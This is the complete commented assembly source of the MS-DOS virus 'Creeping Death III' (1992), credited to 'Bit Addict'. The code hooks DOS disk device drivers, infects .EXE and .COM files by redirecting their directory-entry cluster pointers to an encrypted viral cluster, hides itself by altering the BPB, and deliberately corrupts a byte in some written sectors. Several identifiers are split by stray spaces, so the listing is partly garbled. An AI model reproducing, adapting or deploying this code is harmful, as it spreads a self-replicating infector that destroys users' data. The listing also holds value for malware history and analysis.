2022-08-21 09:07:57 +00:00
; ;
; Creeping Death III (Encrypting, try to find it) ;
; ;
; (c) Copyright 1992 by Bit Addict ;
; ;
code seg ment public 'code'
assume cs : code , ds : code , es : code , ss : code
; ;
; Data ;
; ;
org 5ch ; use the space reserved for
; the fcbs and command line
; for more inportant data,
; because we won't need this
; data when the virus is
; installed
EncryptWrite2: db 36 dup ( ? ) ; Encrypt DoRequest Encrypt
BPB_Buf db 32 dup ( ? ) ; buffer for BPB
Request equ this dword ; address of the request header
RequestOffset dw ?
RequestSegment dw ?
org 100h ; com-file starts at offset 100
; hex
; ;
; Actual start of virus. In this part the virus initializes the stack and ;
; adjusts the device driver used by dos to read and write from floppy's and ;
; hard disks. Then it will start the orginal exe or com-file ;
; ;
Encrypt: mov si , offset Main - 1 ; this part of the program
mov cx , 400h - 11 ; will decode the encoded
Repeat: xor byte ptr [ si ], 0 ; program, so it can be
inc si ; executed
loop Repeat
Main: mov sp , 600h ; init stack
inc word ptr Counter
; ;
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
; si will be -1 ;
; ;
DosVersion: mov ah , 30h ; fn 30h = Get Dosversion
int 21h ; int 21h
cmp al , 4 ; major dosversion
sbb di , di
mov byte ptr drive [ 2 ], - 1 ; set 2nd operand of cmp ah,??
; ;
; Adjust the size of the codesegment, with dos function 4ah ;
; ;
mov bx , 60h ; Adjust size of memory block
mov ah , 4ah ; to 60 paragraphs = 600h bytes
int 21h ; int 21h
mov ah , 52h ; get internal list of lists
int 21h ; int 21h
; ;
; If the virus code segment is located behind the dos config memory block the ;
; code segment will be part of the config memory block making it 61h ;
; paragraphs larger. If the virus is not located next to the config memory ;
; block the virus will set the owner to 8h (Dos system) ;
; ;
mov ax , es :[ bx - 2 ] ; segment of first MCB
mov dx , cs ; dx = MCB of the code segment
dec dx
NextMCB: mov ds , ax ; ax = segment next MCB
add ax , ds :[ 3 ]
inc ax
cmp ax , dx ; are they equal ?
jne NextMCB ; no, not 1st program executed
cmp word ptr ds :[ 1 ], 8
jne NoBoot
add word ptr ds :[ 3 ], 61h ; add 61h to size of block
NoBoot: mov ds , dx ; ds = segment of MCB
mov word ptr ds :[ 1 ], 8 ; owner = dos system
; ;
; The virus will search for the disk paramenter block for drive a: - c: in ;
; order to find the device driver for these block devices. If any of these ;
; blocks is found the virus will install its own device driver and set the ;
; access flag to -1 to tell dos this device hasn't been accesed yet. ;
; ;
cld ; clear direction flag
lds bx , es :[ bx ] ; get pointer to first drive
; paramenter block
Search: cmp bx , - 1 ; last block ?
je Last
mov ax , ds :[ bx + di + 15h ] ; get segment of device header
cmp ax , 70h ; dos device header ??
jne Next ; no, go to next device
xchg ax , cx
mov byte ptr ds :[ bx + di + 18h ], - 1 ; set access flag to "drive
; has not been accessed"
mov si , offset Header - 4 ; set address of new device
xchg si , ds :[ bx + di + 13h ] ; and save old address
mov ds :[ bx + di + 15h ], cs
Next: lds bx , ds :[ bx + di + 19h ] ; next drive parameter block
jmp Search
; ;
; If the virus has failed in starting the orginal exe-file it will jump here. ;
; ;
Boot: mov ds , ds :[ 16h ] ; es = parent PSP
mov bx , ds :[ 16h ] ; bx = parent PSP of Parent PSP
xor si , si
sub bx , 1 ; filename+path available ?
jnb Exec ; yes, execute it
mov ax , cs ; get segment of MCB
dec ax
mov ds , ax
mov cl , 8 ; count length of filename
mov si , 8
mov di , 0ffh
Count: lodsb
or al , al
loopne Count
not cl
and cl , 7
NextByte: mov si , 8 ; search for this name in the
inc di ; parent PSP to find the path
push di ; to this file
push cx
rep cmpsb
pop cx
pop di
jne NextByte
BeginName: dec di ; name found, search for start
cmp byte ptr es :[ di - 1 ], 0 ; of name+path
jne BeginName
mov si , di
mov bx , es
jmp short Exec ; execute it
; ;
; If none of these devices is found it means the virus is already resident ;
; and the virus wasn't able to start the orginal exe-file (the file is ;
; corrupted by copying it without the virus memory resident). If the device ;
; is found the information in the header is copied. ;
; ;
Last: jcxz Exit
; ;
; The information about the dos device driver is copyed to the virus code ;
; segment ;
; ;
mov ds , cx ; ds = segment of Device Driver
add si , 4
push cs
pop es
mov di , offset Header ; prepare header of the viral
movsw ; device driver and save the
lodsw ; address of the dos strategy
mov es : StrBlock , ax ; and interrupt procedures
mov ax , offset Strategy
mov es : IntBlock , ax
mov ax , offset Interrupt
; ;
; Deallocate the environment memory block and start the this file again, but ;
; if the virus succeeds it will start the orginal exe-file. ;
; ;
push cs
pop ds
mov bx , ds :[ 2ch ] ; environment segment
or bx , bx ; environment available ?
jz Boot ; no, computer is rebooted
mov es , bx
mov ah , 49h ; deallocate memory
int 21h
xor ax , ax ; end of environment is marked
mov di , 1 ; with two zero bytes
Seek: dec di ; scan for end of environment
jne Seek
lea si , ds :[ di + 2 ] ; es:si = start of filename
Exec: push bx
push cs
pop ds
mov bx , offset Param
mov ds :[ bx + 4 ], cs ; set segments in EPB
mov ds :[ bx + 8 ], cs
mov ds :[ bx + 12 ], cs
pop ds
push cs
pop es
mov di , offset Filename ; copy name of this file
push di
mov cx , 40
rep movsw
push cs
pop ds
mov ah , 3dh ; open file, this file will
mov dx , offset File ; not be found but the entire
int 21h ; directory is searched and
pop dx ; infected
mov ax , 4b00h ; execute file
int 21h
Exit: mov ah , 4dh ; get exit-code
int 21h
mov ah , 4ch ; terminate (al = exit code)
int 21h
; ;
; Installation complete ;
; ;
; ;
; The next part contains the device driver used by creeping death to infect ;
; directory's ;
; ;
; The device driver uses only the strategy routine to handle the requests. ;
; I don't know if this is because the virus will work better or the writer ;
; of this virus didn't know how to do it right. ;
; ;
Strategy: mov cs : RequestOffset , bx ; store segment and offset of
mov cs : RequestSegment , es ; request block
retf ; return to dos (or whatever
; called this device driver)
Interrupt: push ax ; driver strategy block
push bx ; save registers
push cx
push dx
push si
push di
push ds
push es
les bx , cs : Request ; es:bx = request block
push es ; ds:bx = request block
pop ds
mov al , ds :[ bx + 2 ] ; command code
cmp al , 4 ; read sector from disk
je Input
cmp al , 8 ; write sector to disk
je Output
cmp al , 9
je Output
call DoRequest ; let dos do handle the request
cmp al , 2 ; Build BPB
jne Return
lds si , ds :[ bx + 12h ] ; copy the BPB and change it
mov di , offset bp b_buf ; into one that hides the virus
mov es :[ bx + 12h ], di
mov es :[ bx + 14h ], cs
push es ; copy
push cs
pop es
mov cx , 16
rep movsw
pop es
push cs
pop ds
mov al , ds :[ di + 2 - 32 ] ; change
cmp al , 2
adc al , 0
cmp word ptr ds :[ di + 8 - 32 ], 0 ; >32mb partition ?
je m32 ; yes, jump to m32
sub ds :[ di + 8 - 32 ], ax ; <32mb partition
jmp short Return
m32: sub ds :[ di + 15h - 32 ], ax ; >32mb partition
sbb word ptr ds :[ di + 17h - 32 ], 0
Return: pop es ; return to caller
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
Output: inc byte ptr cs : Random ; increase counter
jnz Skip ; zero ?
push bx ; yes, change one byte in the
push ds ; sector to write
lds bx , ds :[ bx + 16h ]
inc bh
inc byte ptr ds :[ bx ] ; destroy some data
pop ds
pop bx
Skip: mov cx , 0ff09h
call Ch eck ; check if disk changed
jz Di sk ; yes, write virus to disk
jmp InfectSector ; no, just infect sector
Disk: call DoRequest
jmp short InfectDisk
ReadError: add sp , 16 ; error during request
jmp short Return
Input: call ch eck ; check if disk changed
jnz InfectDisk ; no, read sector
jmp Read
InfectDisk: mov byte ptr ds :[ bx + 2 ], 4 ; yes, write virus to disk
cld ; save last part of request
lea si , ds :[ bx + 0eh ]
mov cx , 8
Save: lodsw
push ax
loop Save
mov word ptr ds :[ bx + 14h ], 1 ; read 1st sector on disk
call ReadSector
jnz ReadError
mov byte ptr ds :[ bx + 2 ], 2 ; build BPB
call DoRequest
lds si , ds :[ bx + 12h ] ; ds:si = BPB
mov di , ds :[ si + 6 ] ; size of root directory
add di , 15 ; in sectors
mov cl , 4
shr di , cl
mov al , ds :[ si + 5 ]
mov dx , ds :[ si + 0bh ]
mul dx ; ax=fat sectors, dx=0
add ax , ds :[ si + 3 ]
add di , ax
push di ; save it on stack
mov ax , ds :[ si + 8 ] ; total number of sectors
cmp ax , dx ; >32mb
jnz More ; no, skip next 2 instructions
mov ax , ds :[ si + 15h ] ; get number of sectors
mov dx , ds :[ si + 17h ]
More: xor cx , cx ; cx=0
sub ax , di ; dx:ax=number is data sectors
sbb dx , cx
mov cl , ds :[ si + 2 ] ; cx=sectors / cluster
div cx ; number of clusters on disk
cmp cl , 2 ; 1 sector/cluster ?
sbb ax , - 1 ; number of clusters (+1 or +2)
push ax ; save it on stack
call Convert ; get fat sector and offset in
mov byte ptr es :[ bx + 2 ], 4 ; sector
mov es :[ bx + 14h ], ax
call ReadSector ; read fat sector
lds si , es :[ bx + 0eh ]
add si , dx
sub dh , cl ; has something to do with the
adc dx , ax ; encryption of the pointers
mov word ptr cs :[ gad + 1 ], dx
cmp cl , 1 ; 1 sector / cluster
jne Ok
not di ; this is used when the
and ds :[ si ], di ; clusters are 1 sector long
pop ax ; allocate 1st cluster
push ax
inc ax
push ax
mov dx , 0fh
test di , dx
jz Here
inc dx
mul dx
Here: or ds :[ si ], ax
pop ax
call Convert
mov si , es :[ bx + 0eh ]
add si , dx
Ok: mov ax , ds :[ si ] ; allocate last cluster
and ax , di
mov dx , di
dec dx
and dx , di
not di
and ds :[ si ], di
or ds :[ si ], dx
cmp ax , dx ; cluster already allocated by
pop ax ; the virus ?
pop di
mov word ptr cs :[ pointer + 1 ], ax
je Di skInfected ; yes, don't write it and go on
mov dx , ds :[ si ]
mov byte ptr es :[ bx + 2 ], 8 ; write the adjusted sector to
call DoRequest ; disk
jnz Di skInfected
mov byte ptr es :[ bx + 2 ], 4 ; read it again
call ReadSector
cmp ds :[ si ], dx ; is it written correctly ?
jne Di skInfected ; no, can't infect disk
dec ax
dec ax ; calculate the sector number
mul cx ; to write the virus to
add ax , di
adc dx , 0
push es
pop ds
mov word ptr ds :[ bx + 12h ], 2
mov ds :[ bx + 14h ], ax ; store it in the request hdr
test dx , dx
jz Less
mov word ptr ds :[ bx + 14h ], - 1
mov ds :[ bx + 1ah ], ax
mov ds :[ bx + 1ch ], dx
Less: mov ds :[ bx + 10h ], cs
mov ds :[ bx + 0eh ], 100h
mov byte ptr es :[ bx + 2 ], 8 ; write it
call EncryptWrite1
DiskInfected: mov byte ptr ds :[ bx + 2 ], 4 ; restore this byte
std ; restore other part of the
lea di , ds :[ bx + 1ch ] ; request
mov cx , 8
Load: pop ax
loop Load
Read: call DoRequest ; do request
mov cx , 9
InfectSector: mov di , es :[ bx + 12h ] ; get number of sectors read
lds si , es :[ bx + 0eh ] ; get address of data
sal di , cl ; calculate end of buffer
xor cl , cl
add di , si
xor dl , dl
push ds ; infect the sector
push si
call find
jcxz no_inf ; write sector ?
mov al , 8
xchg al , es :[ bx + 2 ] ; save command byte
call DoRequest ; write sector
mov es :[ bx + 2 ], al ; restore command byte
and byte ptr es :[ bx + 4 ], 07fh
no_inf: pop si
pop ds
inc dx ; disinfect sector in memory
call find
jmp Return ; return to caller
; ;
; Subroutines ;
; ;
Find: mov ax , ds :[ si + 8 ] ; (dis)infect sector in memory
cmp ax , "XE" ; check for .exe
jne com
cmp ds :[ si + 10 ], al
je found
Com: cmp ax , "OC" ; check for .com
jne go_on
cmp byte ptr ds :[ si + 10 ], "M"
jne go_on
Found: test word ptr ds :[ si + 1eh ], 0ffc0h ; file to big
jnz go_on ; more than 4mb
test word ptr ds :[ si + 1dh ], 03ff8h ; file to small
jz go_on ; less than 2048 bytes
test byte ptr ds :[ si + 0bh ], 1ch ; directory, system or
jnz go_on ; volume label
test dl , dl ; infect or disinfect ?
jnz rest
Pointer: mov ax , 1234h ; ax = viral cluster
cmp ax , ds :[ si + 1ah ] ; file already infected ?
je go_on ; yes, go on
xchg ax , ds :[ si + 1ah ] ; exchange pointers
Gad: xor ax , 1234h ; encryption
mov ds :[ si + 14h ], ax ; store it on another place
loop go_on ; change cx and go on
Rest: xor ax , ax ; ax = 0
xchg ax , ds :[ si + 14h ] ; get pointer
xor ax , word ptr cs :[ gad + 1 ] ; Encrypt
mov ds :[ si + 1ah ], ax ; store it on the right place
Go_on: rol word ptr cs :[ gad + 1 ], 1 ; change encryption
add si , 32 ; next directory entry
cmp di , si ; end of buffer ?
jne find ; no, do it again
ret ; return
Check: mov ah , ds :[ bx + 1 ] ; get number of unit
Drive: cmp ah , - 1 ; same as last call ?
mov byte ptr cs :[ drive + 2 ], ah ; set 2nd parameter
jne Ch anged
push ds :[ bx + 0eh ] ; save word
mov byte ptr ds :[ bx + 2 ], 1 ; disk changed ?
call DoRequest
cmp byte ptr ds :[ bx + 0eh ], 1 ; 1=Yes
pop ds :[ bx + 0eh ] ; restore word
mov ds :[ bx + 2 ], al ; restore command
Changed: ret ; return
ReadSector: mov word ptr es :[ bx + 12h ], 1 ; read sector from disk
DoRequest: db 09ah ; call 70:?, orginal strategy
StrBlock dw ? , 70h
db 09ah ; call 70:?, orginal interrupt
IntBlock dw ? , 70h
test byte ptr es :[ bx + 4 ], 80h ; error ? yes, zf = 0
ret ; return
Convert: cmp ax , 0ff0h ; convert cluster number into
jae Fat16 ; an sector number and offset
mov si , 3 ; into this sector containing
xor word ptr cs :[ si + gad - 1 ], si ; the fat-item of this
mul si ; cluster
shr ax , 1
mov di , 0fffh
jnc Continue
mov di , 0fff0h
jmp short Continue
Fat16: mov si , 2
mul si
mov di , 0ffffh
Continue: mov si , 512
div si
inc ax
EncryptWrite1: push ds ; write virus to disk
push cs ; (encrypted) save regs
pop ds
push es
push cs
pop es
cld ; copy forward
mov cx , 12 ; length of encryptor
mov si , offset Encrypt ; start of encryptor
mov di , offset EncryptWrite2 ; destenation
inc byte ptr ds :[ si + 8 ] ; change xor value
rep movsb ; copy encryptor
mov cl , 10 ; copy dorequest proc
mov si , offset DoRequest
rep movsb
mov cl , 12 ; copy encryptor
mov si , offset Encrypt
rep movsb
mov ax , 0c31fh ; store "pop ds","ret"
stosw ; instructions
pop es ; restore register
jmp EncryptWrite2 ; encrypt and write vir
; ;
; Data ;
; ;
File db "C:" , 255 , 0 ; the virus tries to open this
; file
Counter dw 0 ; this will count the number of
; systems that are infected by
; this virus
Param dw 0 , 80h , ? , 5ch , ? , 6ch , ? ; parameters for the
; exec-function
Random db ? ; if this byte becomes zero
; the virus will change the
; sector that will be written
; to disk
Header db 7 dup ( ? ) ; this is the header for the
; device driver
Filename db ? ; Buffer for the filename used
; by the exec-function
; ;
; The End ;
; ;
code ends ; end of the viral code
end Encrypt ; start at offset 100h for
; com-file